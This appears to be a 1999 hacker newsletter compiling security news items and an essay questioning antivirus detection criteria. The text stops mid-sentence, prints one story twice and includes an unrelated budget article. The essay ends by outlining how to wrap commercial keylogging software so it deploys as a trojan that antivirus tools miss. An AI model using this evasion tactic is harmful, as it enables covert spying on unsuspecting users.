~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench US Marshalls have reportedly seized five computers and have executed several search warrants in Sacramento and Downey, California, and Troy and West Bloomfield, Michigan. The people arrested have been accused of using the irc channel 'warez4cable' to trade copyrighted software. The accused individuals could face up to US$100,000 in fines for copyright infringement. BSA claimed that the IRC channel has been shut down (seems open right now, just +i) and that this case has had a dramatic impact on online piracy. (Dramatic impact? One channel out of thousands? Yeah, OK, sure.) Wired http://www.wired.com/news/technology/0,1282,32616,00.html Warez Chatters Busted: Piracy by Wired News Report 3:45 p.m. 17.Nov.1999 PST The Business Software Alliance is pressing charges against 25 people the organization accuses of trafficking pirated software on the Internet. US Marshals reportedly seized five computers and performed unannounced searches in the homes of several of those accused of the pirating, including residents of Sacramento and Downey, California, and Troy and West Bloomfield, Michigan. The accused individuals could face up to US$100,000 in fines for copyright infringement, the BSA said. The individuals were allegedly using a channel on Internet Relay Chat, a real-time chat network commonly used by hackers and crackers to communicate and plan their activities. The channel, called warez4cable, has been shut down, according to the BSA, as well as several other warez channels. Warez refers to software that has been stripped of its copy-protection and made available on the Internet for downloading. The BSA said in a statement that the action against the warez users is part of an initiative to "shut down illegal trafficking of software on the Internet." "We have seen an immediate impact on piracy in IRC channels as a result of the lawsuit," BSA enforcement official Bob Kruger said. "BSA will continue to fight piracy on the Internet to keep it a safe place for those who are engaging in legitimate commerce." @HWA 28.0 US Concerned About Chinese Statements ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles Recent posturing by the Chinese government about information warfare has the US worried. The People's Liberation Army has announced that it will gear up its information warfare capabilities to rival that of it land, sea and air forces. Vice Adm. Thomas Wilson, the new director of the Defense Intelligence Agency (DIA) has called the Chinese plans and there open discussion of them unsettling. (Let the arms race begin.) Washington Times http://www.washingtontimes.com/news/news3.html House OKs budget of $384 billion for '00 By Dave Boyer THE WASHINGTON TIMES he 106th Congress is wrapping up its first session with Republican lawmakers trumpeting admittedly modest spending achievements and Democrats bemoaning lost opportunities for new regulations. The House Thursday passed, 296-135, the final $384 billion spending bill for fiscal 2000, while the Senate cleared the way for a vote Friday. The measure calls for a 0.38 percent across-the-board cut -- not including congressional salaries and government entitlements. House Speaker J. Dennis Hastert of Illinois, who worked until 3:30 a.m. Thursday to complete the budget, said Republicans can be proud of balancing the budget, saving Social Security funds, increasing spending for education and defense and passing a tax cut that -- Continued from Front Page -- President Clinton vetoed. "We did all of the things we set out to do," Mr. Hastert said. "We've done the things that the American people wanted us to do." House Minority Leader Richard A. Gephardt of Missouri said Congress accomplished little of importance. Mr. Gephardt expressed disappointment that Congress did not ban "soft money" in political campaigns, failed to pass gun regulations or a minimum-wage increase, and did not enact a new benefit for prescription drugs. (Soft money is unlimited and largely unregulated donations.) "We're leaving here without doing the things that people most wanted us to do," Mr. Gephardt said. Looking back, Democrats are happy about one thing that Congress didn't do -- remove Mr. Clinton from office after his impeachment last December. His trial in the Senate ended Feb. 12 without the necessary two-thirds vote to oust him. Asked what he thought was Congress' single-biggest achievement this year, Senate Minority Leader Tom Daschle said, "In a strange sort of way, I think it's probably the successful handling of the impeachment process. There was so much riding on it." While Congress may have put the impeachment behind it, there is still a healthy dislike for the Clintons in evidence. Just Thursday the House deleted from the budget a White House request, championed by first lady Hillary Rodham Clinton, for $3 million for a music museum in New York, where she is contemplating a run for the Senate. Mr. Daschle said the Senate's defeat of the Comprehensive Test Ban Treaty was the worst moment of the session, calling it "an embarrassment to the country." Republicans consider the vote important, saying the treaty would have weakened the nation's defenses by throwing into doubt the reliability of the U.S. nuclear stockpile. From a fiscal perspective, Republicans ducked the reality they are spending about 5 percent more in fiscal 2000 than last year. They chose instead to focus on victories within the overall budget, such as protecting Social Security funds from being used for the general budget. At a rally of House Republicans Thursday night after the vote, Rep. Jennifer Dunn of Washington said the Social Security issue will resonate with women. "Women live longer than men, and yet they retire on fewer dollars," Mrs. Dunn said. "The security in their lives will be there when they get to retirement age." Almost by accident, Republicans hit on a popular feature this year that may become part of future budgets -- across-the-board cuts aimed ostensibly at eliminating government waste and fraud. The idea was proposed earlier this year by Rep. John R. Kasich, Ohio Republican and chairman of the House Budget Committee, but was largely ignored until late in budget negotiations when the GOP needed to save several billion dollars to balance the budget. Mr. Clinton and congressional Democrats fought a 1 percent cut but relented at 0.38 percent, and Republicans are finding that constituents like the idea. "It's very reasonable, it's fair and it's an effective management tool," said Rep. Asa Hutchinson, Arkansas Republican. "We'll come back and try it again next year." Defense spending was a big reason for the overall budget increase. After years of defense cuts under Mr. Clinton, Congress this year appropriated $268 billion for the military -- about $17 billion more than last year and more than Mr. Clinton requested. "This year, we Republicans can be very proud that we took a critical first step towards addressing the needs of our long-ignored defense structure," said Rep. Tillie Fowler, Florida Republican and a member of the Armed Services Committee. House Majority Leader Dick Armey, Texas Republican, said that in addition to increasing defense spending and reducing the national debt by $130 billion, the Republican-led Congress thwarted Mr. Clinton's proposals for more than 70 different tax increases. "All of those I think are reasons for us to be very pleased with a good year's work," Mr. Armey told reporters. With only a five-vote majority in the House, Republicans said they had little choice this year but to compromise with the administration on a variety of issues. Although overall spending increased significantly, the GOP said it was victorious in curtailing Mr. Clinton's budget priorities much more than last year. Said Sen. Paul Coverdell of Georgia, secretary of the Senate Republican Conference, "The wonder to me is, given the limited beachhead -- we've never had what you'd call a decisive majority in the House, an organizational majority but not a governing majority in the Senate, we don't have the presidency -- the wonder is we've come so far." Although Republican lawmakers did give in to Mr. Clinton's request to pay about $1 billion in U.N. dues, they won a provision for which they had been fighting since 1994 -- restricting foreign aid from being used for family planning services overseas. "This seems to a lot of people like a small thing . . . but for five years we tried to win on that issue, and this year we by and large got Ronald Reagan's policy back into the law," Mr. Armey said. On education, although Republicans acquiesced to Mr. Clinton's demand to continue funding his program to hire 100,000 teachers, the GOP won concessions from the White House to funnel some of the money for teacher certification. The Senate in October passed, for the third time in four years, a ban on "partial birth" abortions, but again failed to achieve enough votes to override Mr. Clinton's certain veto. The House has yet to take up the issue. @HWA 29.0 The state of the net in Bulgaria ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Zym0t1c BRUSSELS | Nov 19 1999 - A hacker called g-RaX defaced both websites of our Belgian State Council and our Treasury... g-RaX left some small notes referring to our phone company (Belgacom), probably because of the high internet prices, and to the famous Belgian writer Herman Brusselmans who has been charged because he sort of insulted An Demeulemeester, a (great) Belgian fashion designer, in his latest book. Screw them! I love his books... The point is that the State Council is not impressed by this burglary... Both websites were hosted on stand-alone computers which weren't connected at all with their internal network, so g-RaX formed no threats... However, the State Council is pressing charges against g-RaX. Belgian State Council: http://www.raadvst-consetat.be/ Belgian Treasury: http://treasury.fgov.be/ (Neither site was defaced at the time I received this email - Ed) @HWA 30.0 More on the PIII chip ID ~~~~~~~~~~~~~~~~~~~~~~~~ http://www.heise.de/ct/english/99/05/news1/ Christian Persson Pentium III serial number is soft switchable after all Intels privacy strategy changed again The controversial serial number of the new Pentium III processors can be read on the quiet after all. Contrary to Intels description so far, the system architecture allows for individual identification by software tricks without a users explicit allowance or notice. Intels new technique for securing E-Commerce transactions already caused quite a stir as the Pentium III presentations approached. Privacy advocates expected the readable serial number to act as a "permanent cookie" and to produce the completely transparent surfer. The processor manufacturer appeased with the guarantee, the user would have full control whether he would allow the read-out of the serial number. Once switched off, the corresponding processor command could not be activated until the next cold start. This description has proved wrong. The processor expert of c't magazine, Andreas Stiller, has figured out a procedure to switch on the command for reading out the serial number by software. This procedure is based on specific features of the system architecture that are documented. They would have got around in cracker circles sooner or later. A spokesperson from Intel confirmed upon inquiry by c't, that the serial number can be re-activated this way. Intels solution is a renewed correction of announcements how privacy in spite of the serial number could be guaranteed: whereas only a software tool for switching the serial number on and off was intended so far, now the PC manufacturers are encouraged to integrate the configuration of the switching into the BIOS. This way, the switching on by software could be prevented. Earlier Intel had rejected this method with the argument, changes in the BIOS setup could not be expected from untrained users. Intel said that the BIOS manufacturers had been informed correspondingly. Also, they had been equipped with software samples. It remains to be seen, how many manufacturers will be able to incorporate appropriate BIOS functions into the first delivered Pentium III systems and how they are configured by default. To top it all, the new privacy concept has holes, too: after all, the BIOS setting has to be stored in the CMOS memory. Someone who knows the respective BIOS very well can crack this, too. (as) Addendum The wording "A spokesperson from Intel confirmed upon inquiry by c't, that the serial number can be re-activated this way" in the above text has been taken as an acknowledgement, that the software developed by c't has been checked by Intel. This is not the case. Actually, the spokesperson made a statement about the procedure that c't described to an Intel specialist. -=- Software claims to undo Pentium III fix By Michael Kanellos and Stephanie Miles Staff Writers, CNET News.com March 10, 1999, 6:30 p.m. PT Canadian software developers say they have created a program that can obtain the Pentium III processor serial number despite the privacy protection measures taken recently by Intel. Zero Knowledge Systems of Montreal said today that it has developed an ActiveX control that can retrieve the serial number under certain circumstances, even after a software repair released last month by Intel has disabled the feature and ostensibly "hid" the number from prying eyes. The Pentium III serial number has turned into a public-relations nightmare for the world's largest chipmaker. Although Intel included the number in the chip as a way to improve Internet security, it has drawn protests from privacy advocates who say it provides hackers with an opportunity to obtain sensitive information. Zero Knowledge's control essentially exploits the approximate 15-second gap between the time a Pentium III computer is turned on and exposes the processor serial number and when the software repair kicks in and covers it up. The control tricks the computer into crashing. Then, as the machine is rebooted, Zero's software grabs the number before the software utility has a chance to disable it again. "It simulates a crash and could be attached to a virus, hidden inside an email attachment, shareware--anyway that people get hostile code onto your machine," Zero Knowledge president Austin Hill said. The ActiveX control grabs the serial code upon reboot, Hill said, and places it in a cookie file that can be read by Web sites. The Pentium III includes a serial code hardwired into the chip, along with incremental improvements in speed and multimedia instructions. Privacy and consumer rights groups are up in arms over the new feature, which they say can provide an easy way for unscrupulous marketers and hackers to track users based on their surfing habits. Some groups have called for a boycott of Intel, while others, including the Center for Democracy and Technology, the ACLU, and the Electronic Privacy Information Center, are meeting with the FTC to pursue an investigation into the serial code. Intel included the feature as an additional security precaution for e-commerce and to aid corporations tracking technology assets. The number is "on," or can be read by a distant server, when the computer is turned on. Intel has shipped a software utility to PC makers that turns the serial code off. For greater security, manufacturers can also disable the code in the BIOS, or boot-up software. The BIOS patch hides the serial number at a much earlier point in time. In addition, Intel confirmed today that certain mobile Pentium II and Celeron processors also contain the controversial serial code. Zero's hack differs from German technology publication's proposed method of getting around the disabling software utility reported earlier. The magazine c't postulated that the serial code could be read upon awakening from energy-saving "deep sleep" mode, Hill said. Intel has not yet seen Zero's software utility, and declined to comment on whether the hack actually disables the serial code utility. But as when c't pointed out that the software utility could be bypassed, company spokesman George Alfs noted that all software can be hacked. "We would want to look at the code before we make a comment on that," Alfs said. "But the end user always needs to be aware of malicious software." Zero-Knowledge recommends that consumers make certain that the serial code is disabled in the BIOS, Hill said. "Intel built the serial number and was surprised by how seriously people take their privacy," Hill said. "They said 'theoretically it may be broken'--it turns out it's not that theoretical after all." @HWA 31.0 Security Lawsuits Next After Y2K ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Fred Smith, an attorney at Panagakos and Wirth, Santa Fe, N.M seems to think that lawsuits regarding software security in e-commerce will be the next big thing after Y2K. (Wonder how the Uniform Commercial Code that exempts all software from any liability will figure into these lawsuits.) CMP Techweb http://www.techweb.com/wire/story/TWB19991117S0005 Security Lawsuits To Replace Y2K Litigation By Mary Mosquera, TechWeb Nov 17, 1999 (8:13 AM) URL: http://www.techweb.com/wire/story/TWB19991117S0005 Washington, D.C. -- Lawsuits involving computer security in e-commerce will explode after Y2K litigation runs out of steam, which could be quicker than originally believed. It appears that the deluge of Y2K lawsuits will not happen because of legislation that protects companies that share information about their Y2K vulnerabilities and limits on litigation related to problems caused by Y2K computer glitches. Instead, lawsuits may be in response to computer security guarantees that failed or lapses in security within a network because some of those responsible may not know enough, said Fred Smith, an attorney at Panagakos and Wirth, Santa Fe, N.M. There may also be more typical fraud in e-commerce, such as non-performance of contract, credit card fraud, or one company falling victim to a fraudulent but seemingly legal virtual venture, he said. Speaking at the Computer Security Institute's conference here, Smith said lawyers want to jump into the sphere of e-commerce litigation. "But the legal process is not working," he said. "Developing new law won't catch up with the speed of technology." As a result, companies doing business online need to include as part of their computer security plans the ability to collect digital evidence that can be used to defend themselves to prosecute or to use if they are a witness, said Mark Pollitt, chief of the FBI's computer analysis response team. But companies have no best practices or standards yet on which to develop their network security. And the judicial system has no set of statutes addressing problems particular to security in e-commerce, Smith said. It is all new territory for companies to consider how secure they can make their networks without privacy implications, how to collect digital evidence that would be clear and stand up in court, and how to consider other countries' laws since so much of e-commerce is global, Pollitt said. "Companies have to start thinking about being evidence gatherers and that they will sue or be sued at some time," Smith said. Evidence -- which may be e-mails, digital images, or a network security plan -- must be able to be presented as a story in court so attorneys, judges, and juries can understand, Smith said. @HWA 32.0 Another Singaporean Cyber Intruder Pleads Guilty ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne 18 year old Peng Yuan Han, an Anglo-Chinese Junior College student, pleaded guilty to unauthorized use of a computer service, unauthorized access and modifications to a computer, and abetting unauthorized access. He admits to having electronically broken into the systems of the National Computer Board (NCB), Ministry of Education (MOE) and Nanyang Technological University (NTU). (It would be interesting to see what would happen if someone actually plead innocent and fought such a charge.) The Straits Times http://straitstimes.asia1.com.sg/cyb/cyb1_1117.html url not found - Ed @HWA 33.0 SingCERT Releases Year to Date Stats ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne SingCERT has released statistics on the online threats that have been reported to it up to October of this year. They have reported over seventeen different viruses infecting Singaporean users with over 400 victims from Chernobyl alone. 49 cases of illegal scanning had been reported and 27 cases of unauthorized intrusions. (Interesting but why are the numbers so low?) Straits Times http://straitstimes.asia1.com.sg/cyb/cyb2_1118.html Straits Times - Yes, they had two stories http://straitstimes.asia1.com.sg/cyb/cyb1_1118.html wtf. urls not found again ... - Ed @HWA 34.0 Canadian Telecom Firm Gets Security Clearance ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by cult hero TMI Communications Inc. will be the first to offer satellite telecommunications services in the U.S. market. They have been granted approval after they agreed to allow US law enforcement agencies to install wiretap capability into their systems. The agreement came after the US agencies agreed not to spy on Canadian citizens. Canoe http://www.canoe.ca/MoneyNewsTechnology/sept13_tmisatellite.html Monday, September 13, 1999 Technology News TMI sets precedent with U.S. deal Wins security clearance: Telecom firm agrees to wiretaps -- but not on Canadians By PETER MORTON The Financial Post WASHINGTON - A tiny Canadian satellite communications company will be the first foreign firm to receive top security approval from the FBI to operate a telecommunications business in the United States after agreeing to allow U.S. security agencies to wiretap its service. The precedent-setting deal, to be signed today, will soon allow TMI Communications Inc. to offer satellite telecommunications services in the U.S. market, Larry Boisvert, TMI's chief executive, confirmed in an interview. "If you want to provide telecommunications in the U.S. you have to be prepared to meet the security required as determined by the FBI and the Department of Justice," Mr. Boisvert said. Even though it will operate the service from Canada, TMI agreed to put a digital switch in the United States that would give FBI and other U.S. security agencies the ability to listen in on satellite calls or copy data, such as financial records, as required by new federal laws that will force all U.S. mobile communications companies to do the same by next June. As first reported by the National Post in June, the FBI had blocked TMI from getting a Federal Communications Commission licence because it was worried that criminals or terrorists would use foreign-based telecommunications companies to avoid wiretaps. The FBI has complained it can not easily tap phonecalls going through foreign countries. The new agreement, which comes after 17 months of negotiations, would put TMI's switch on U.S. soil, something the FBI plans to demand of any other foreign telecom company wanting to offer services in the United States as part of the 1994 Communications Assistance for Law Enforcement Act, said Mr. Boisvert. "It's going to cost us to do business in the U.S.," he said. "But if you're going to play in someone else's market, you got to be CALEA compliant." A key part of the two agreements being signed today includes one between Canada and the U.S. that prohibits the FBI and any other security agency from tapping the calls being made by, or to, Canadian citizens. Ottawa had balked at giving the FBI blanket access, saying it wanted to protect the privacy of Canadians. Mr. Boisvert insisted the reason the negotiations took so long was not because the U.S. government had security concerns about Telesat or Canada. Rather, he said, the Department of Justice was being extraordinarily careful because the TMI deal would be the model for all other foreign telecommunications companies wanting access to the U.S. market. The United States and 130 other countries agreed in February 1997 to open their telecommunication markets to foreign competition. At the time, however, the United States insisted its security concerns had to be met first, but did not spell out what that meant until TMI became the first foreign telecommunications company to apply for an FCC licence a year later. "Security became the key issue," said Mr. Boisvert. "I suspect this will be a surprise to a lot of others waiting behind us." Besides TMI, which is owned by Telesat Canada Inc. and BCE Inc., Globalstar Canada LP, a partnership of U.S. Globalstar and Canadian Satellite Communications, is also looking to offer U.S. telephone service using Canadian facilities. TMI is hoping to be the first out of the gate to not only offer conventional satellite telephone services, but also to get into two new areas in Canada and the United States -- one involving data transmission and the second called asset management. Mr. Boisvert said TMI is about to roll out the second service in Canada. It essentially involves placing tiny transmitters on everything from railway cars to trucks to allow companies to know exactly where their goods are anywhere in the country. In addition, TMI is talking to major U.S. utilities about installing the devices in homes and businesses so they can remotely track electricity use. "You don't have to send someone to the home to read the meters," he said. "The applications are enormous." The deal being signed today clears the way for TMI to receive an FCC licence after pledging to have the new security features in place before next June. The FCC was worried that demands by the FBI and the Department of Justice would be so onerous that no foreign telecommunications company would want to compete in the U.S. market, something that could set the stage for retaliation against U.S. companies around the world. @HWA 35.0 Dell Gets Some FunLove ~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The production systems of Dell Computers's Limerick, Ireland plant where infected with the FunLove virus causing the plant to shut down for two days and a recall of 12,000 systems. No viruses where later found on customer systems. Irish Times http://www.ireland.com/newspaper/front//1999/1118/fro3.htm Virus at Dell's Limerick plant costs firm millions s By Madeleine Lyons and Éibhir Mulqueen A virus in the production systems of computer giant Dell's Limerick plant is understood to have cost the company millions of pounds. Work at the complex, which employs 3,400 people, was suspended for at least two working days and 12,000 computer units were recalled for checking. The so-called FunLove virus was identified in Dell's production process last Thursday afternoon. It was discovered in systems used to install software in newly-built computers. Production was shut down immediately and 12,000 units, which the company calculated may have been affected, were recalled. Dell builds computers to order and delivers them automatically on completion. According to a spokeswoman for Dell, only 500 units had reached their final destination and each of the customers involved was contacted by the company. These units - and the remaining 11,500 computers in transit - were checked over the weekend and all were found to be free of the virus. Normal production resumed on Monday afternoon. "When the virus was detected first, we had to take immediate precautions to ensure the shipped units were not contaminated," the spokeswoman said. Dell refused to put a figure on the cost of the disruption but one industry source estimated that it may have cost as much as £14 million. The spokeswoman said production was not scheduled over the weekend because the company had just completed its latest quarter involving around the-clock operations. Dell now plans to make up the lost production hours through overtime and weekend work. According to the company, orders placed for desktop computers since Monday will be delayed by two days, while the estimated wait for other products is expected to be slightly longer. The FunLove virus infects both desktop computers and computer servers running Windows 95, 98 and Windows NT operating systems. As it spreads it increases the size of the files it infects by placing a copy of itself at the end of the infected file. When the file is opened under the basic operating system DOS, it launches the message "Fun Loving Criminal". Anti-virus companies said last week that FunLove would be easy to control as long as standard anti-virus procedures were implemented. Dell says it installed a "fix" early on Thursday and the virus was detected in internal systems that afternoon. A number of Irish companies took measures last week to protect their computer systems against the same virus. They included Bank of Ireland, AIB, Ericsson, Microsoft, Eircom, the Revenue Commissioners and Smurfit. Virus at Dell's Limerick plant costs firm millions By Madeleine Lyons and Éibhir Mulqueen A virus in the production systems of computer giant Dell's Limerick plant is understood to have cost the company millions of pounds. Work at the complex, which employs 3,400 people, was suspended for at least two working days and 12,000 computer units were recalled for checking. The so-called FunLove virus was identified in Dell's production process last Thursday afternoon. It was discovered in systems used to install software in newly-built computers. Production was shut down immediately and 12,000 units, which the company calculated may have been affected, were recalled. Dell builds computers to order and delivers them automatically on completion. According to a spokeswoman for Dell, only 500 units had reached their final destination and each of the customers involved was contacted by the company. These units - and the remaining 11,500 computers in transit - were checked over the weekend and all were found to be free of the virus. Normal production resumed on Monday afternoon. "When the virus was detected first, we had to take immediate precautions to ensure the shipped units were not contaminated," the spokeswoman said. Dell refused to put a figure on the cost of the disruption but one industry source estimated that it may have cost as much as £14 million. The spokeswoman said production was not scheduled over the weekend because the company had just completed its latest quarter involving around the-clock operations. Dell now plans to make up the lost production hours through overtime and weekend work. According to the company, orders placed for desktop computers since Monday will be delayed by two days, while the estimated wait for other products is expected to be slightly longer. The FunLove virus infects both desktop computers and computer servers running Windows 95, 98 and Windows NT operating systems. As it spreads it increases the size of the files it infects by placing a copy of itself at the end of the infected file. When the file is opened under the basic operating system DOS, it launches the message "Fun Loving Criminal". Anti-virus companies said last week that FunLove would be easy to control as long as standard anti-virus procedures were implemented. Dell says it installed a "fix" early on Thursday and the virus was detected in internal systems that afternoon. A number of Irish companies took measures last week to protect their computer systems against the same virus. They included Bank of Ireland, AIB, Ericsson, Microsoft, Eircom, the Revenue Commissioners and Smurfit. @HWA 36.0 Melissa Hits Disney ~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by turtlex Melissa is still around wreaking havoc, this time it was Disney Corporation. A variant of Melissa known as Melissa.A infected an internal memo which it then proceeded to mail out to the several members of the press. Luckily the memo did not reveal any corporate secrets, this time. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2396724,00.html?chkpt=zdhpnews01 -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Spies hit Disney? No, just Melissa By Rob Lemos, ZDNN November 17, 1999 6:07 PM PT URL: The Melissa virus was behind an e-mail spam from Walt Disney Co. Wednesday. Disney (NYSE: DIS) inadvertently spammed a host of press members with an internal memo, because the Melissa.A virus, which had infected the memo, mailed out the attachment to a list of people from the company's address book. The memo -- from Disney Vice Chairman Sandy Litvack -- described policy changes in the dates that employees (called "cast members" in Disney-speak) could attend the company's trademark theme parks for no charge. While the incident doesn't appear to have caused any harm, it underscores the potential for computer viruses -- especially macro viruses -- to not only damage data, but to inadvertently publicize it as well. "There is a danger that any type of virus that sends out e-mail, especially macro viruses, could do something like this," said Darren Kessner, a senior virus researcher at Symantec Corp.'s Anti-virus Research Center. The Melissa virus, which struck late last March, spawned a number of copycats, including Melissa.A -- the variant that hit Disney. When an infected document is opened, the virus infects the Word template file -- the starting point for all new Word documents -- and mails the currently open document to the top 50 addresses in the Microsoft Outlook address book. Systems that are set to 'medium' or 'high' security will notify the user that a macro is being run. Those systems that do not use Microsoft Outlook as a mail client will not send out the mass e-mailing. The variant does not destroy any data on the infected system. However, if a document is created on an infected system, mailed to another user, and opened with Microsoft Outlook, the new document will be sent to the top 50 addresses on the new system. This appears to be what happened with the Litvack document. Erik Wedin is one of two Disney employees who inadvertently sent out the infected document to a large number of press members. In an e-mail message to ZDNN, Wedin insisted that Disney uses anti-virus software. "Our I.S. team is trying to figure out why (the virus) wasn't caught," he wrote. "It's amazing that they didn't have more up to date anti-virus software in place," said Symantec's Kessner. While the incident highlights the danger of viruses causing information leaks at companies, Kessner downplayed the danger of viruses being intentionally used for industrial espionage. "This is not the best way," he said. "Furthermore, most virus writers are not interested in the information they can get. They are more interested in getting their name out." @HWA 37.0 How the Anti Virus Industry Works ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by RenderMan So what exactly does it take for a piece of software to end up in a virus scanning package as something to be scanned for? Why is commercial spy software not scanned but freeware tools that do the same thing are? A new article in the Buffer Overflow section takes a look at at the Anti Virus companies and what the criteria is. Buffer Overflow http://www.hackernews.com/orig/buffero.html How the A/V Industry Works By: Renderman, Www.Hackcanada.com RenderMan@Hackcanada.com What do I remember most about DEFCON 7? The mosh pit of Anti-Virus employees at the release of BO2K. Several dozen A/V people from different companies, risking life, limb and large insurance deductibles to get their company the first samples of BO2K was one of the funniest things I remember. At the time it made sense to risk injury to get a copy, the media would reward the first company with a BO2K detection signature with immense amounts of free advertising, after all this was the latest and greatest Trojan/backdoor, right? Well, after seeing Dildog's presentation and the following open challenge to M$ to recall SMS server, the general description of BO2K changed. After initially trying BO2K on an isolated test machine to make sure I didn't screw myself, it has now become my primary method of remote administration on a multiple system 9X/NT network because it is just a damn good program. My opinion now; the anti-virus industry people didn't need to be there. This was a well designed remote control product that happened to be written by hackers, and as with any tool, in the wrong hands it can be dangerous. In the months following defcon , products such as Softeyes (http://www.softeyes.com), and Investigator from Winwhatwhere (http://www.winwhatwhere.com/), and other products that are designed to do much of what the A/V industry says makes a program malicious are not scanned for. When a products can advertise "watches and records everything about every window that gains the focus. It records every keystroke, program name, window title, URL, User and Workstation and the optional 'Silent Install' feature will run the installation silently and invisibly" and not be scanned for, it begs the question, how do you decide? Also you may recall the problems that the folks over at NetBus had when they went commercial and started charging for their product. They had a hard time shedding the image of a hacking tool. This really rattled a lot of peoples cages because the logic that was in use by the people who are saying certain programs are malicious does not make sense when you add these new programs to the mix. Just looking at C|net's technology terror guide (Technology Terrors) you can see the number of products that aren't on any A/V list that are as dangerous, if not more, than BO2K. This whole thing boils down to the question; how do A/V companies decide what criteria makes a piece of code worth being scanned for? Well, rather than rant on like others might do, I went to the source. I looked on A/V sites for a policy statement or a set of internal guidelines. Nothing found. So I sent a mail like any other customer to the customer support department (and if it existed, the A/V research department as well) of the major A/V companies, Symantec, NAI, AVP, Computer Associates, and Panda Software. There were others that could also qualify, but these are what you find most on store shelves. To all the companies I sent the same letter: Dear Sir/Madam, With recent events in the virus industry, it has become apparent to myself and many others that there seems to be a definite bias when is comes to how companies like yours determine what should and should not be scanned for. By what policy do you decide what should be scanned for and eliminated and what is 'legitimate'? After an examination of your web site, no policy statement could be found. Can you clarify by what criteria makes a product malicious or a legitimate product? Thanks RenderMan www.Hackcanada.com As you can see, the letter states my conundrum and the clarification I need, and I don't try to hide who I'm mailing as. I waited a couple weeks for the responses to accumulate and re-sent some that I did not receive responses from. In over two weeks I only received 3 responses. First was a very quick response from Symantec customer support from a gentleman who really was having a really bad day and I think and was not happy to see me. Here is his message with my comments inserted I can assure you that Symantec has absolutely no bias towards any legitimate software developers (What makes a software developer legitimate, is there a license I'm not aware of? I thought anyone could code?) Arguments by some hackers that certain hacker tools are actually legitimate commercial software are themselves extremely biased to the point of not making any sense (I agree we are biased to a point just as you are, but what makes something a hacker tool or a mis-used administration tool?) A good news recent story about this subject is available for reading at this web page, http://www.msnbc.com/news/287542.asp. Both Symantec management and management at other Anti-Virus developers are quoted in this article about this subject. We really would not have anything further to add to these comments on this subject. (The article does not really answer what I was asking.) Best regards, (name omitted) After not answering my original question, I responded because I thought they still had something they could add. This time I went and asked exactly how they decide what should and should not be detected and give an example: Interesting article you reference, but it still does not answer my question. What is your companies policy on determining what should and should not be detected in your Anti-Virus scans? What is defined by your company as legitimate software developers? Are independent developers not in the same boat as large companies such as yourselves? What is preventing Back Orifice 2000 from being a legitimate tool? In the article you specified it says "anyone with the other half of the Back Orifice software (the administration tool) can control the victims PC from anywhere on the Internet". Can not the same be said for your product pcAnywhere? I really appreciate you trying to clear this question up for me. RenderMan www.Hackcanada.com The bit about pcAnywhere was meant to try and get my point across that the differences between good and evil code are blurred. I myself have taken over the computers of friends (with permision) who use PC Anywhere with out passwords and the affect is just the same as using BO2K. His response was less than pleasant, but interesting. Again, here is a transcription with my comments: I'm afraid that this is not at all a legitimate question that you ask here. (I'm a customer, I want to know so I can know if your product will protect me from anything that can be bad.) You know, you aren't even giving me the common courtesy of identifying yourself. (ummm, I signed my name at the bottom, that usually is all people do. The support center never stated anything about needing my full information in order to receive customer support.) Symantec Operates our discussion groups as a support resource for our customers to use to get help from us. They are not meant for engaging in debates like this. (Whoa, hold on, I really am a customer of Norton A/V, and I'm asking a question, how do you decide what to scan for? This is a customer inquiry.) pcAnywhere in not designed to be to installing silently and secretly in the background on a system. It was also not announced at a hackers convention. (So if it announces it's presence but formats your drive without asking it's OK? Since when does the location of announcement mean anything about the product itself?) (name omitted) After that, I let him get back to blowing off other customers questions. MS announced DirectX 2 at a conference done along the theme of ancient Rome. Does this mean DirectX is a technology for guys in robes and olive branches? I think not. Fortunately this response from Symantec was not indicative of all the responses I received. NAI customer support responded quickly as well, this time with a definite different tone. If a program reproduces itself, we call it a virus. If it does something that the user does not expect, we call it a trojan. If it is harmless and funny we call it a joke. (Not a bad though short summary.) There are other categories that could be considered such as Hack tools, BackDoors, worms and Password Stealers. (Now it gets weird. Does L0phtCrack count as a password stealer, or a hacktool, or as just another damn good program?) NAI wasn't clear but I was getting closer. NAI also sent the 3rd and final response that really got me thinking. Thanks for your question. The criteria although not obvious, is simple among researchers. The detection's are mainly customer driven, that is if a client requests detection of a particular problem then it is taken into account. Many of the detection's received come from shared collections, collections that are shared among A/V vendors. Some of the detection's are from samples received from customers and others are from sites referred to us from customers who feel there is a valid threat. Regards, (name omitted) Sr Virus Support Analyst AVERT - a division of nai //* We eat viruses for breakfast, lock and load *// Ding, Ding, Ding, We have a winner. The last line "others are from sites referred to us from customers who feel there is a valid threat." So, the A/V industry uses a common database and submissions from customers..... I'm a customer and I want Investigator, softspy, pcAnywhere and SMS scanned for. I submit to you samples of each to add to your databases. There is no way to get BO2K off the lists, the media just won't have it. But by using the normal submission procedure for suspicious files, it may be possible to add other programs of similar features to the database and make the A/V industry re-think itself. I encourage everyone who has legitimate access to any program that can be used maliciously, submit it to the A/V industry through their virus submission e-mail addresses. A hacker's version of a letter writing campaign. 1 person submitting these programs will be labeled a crackpot, many on the otherhand will have an effect. I for one want a level playing field. If there is a program on my system that can record my keystrokes, passwords, bank account numbers and ship it off anywhere without telling me, I want to know about it. If a person wanted to use a trojan for nefarious purposes they need just be a little creative. Just spend the $100 or so on Investigator or a similar program, use something like Silk Rope to wrap the executable with some benign little program and deploy at will. This is a common tactic used to deploy trojans but with this method, not a word will be uttered by any A/V product and the attacker can go along on 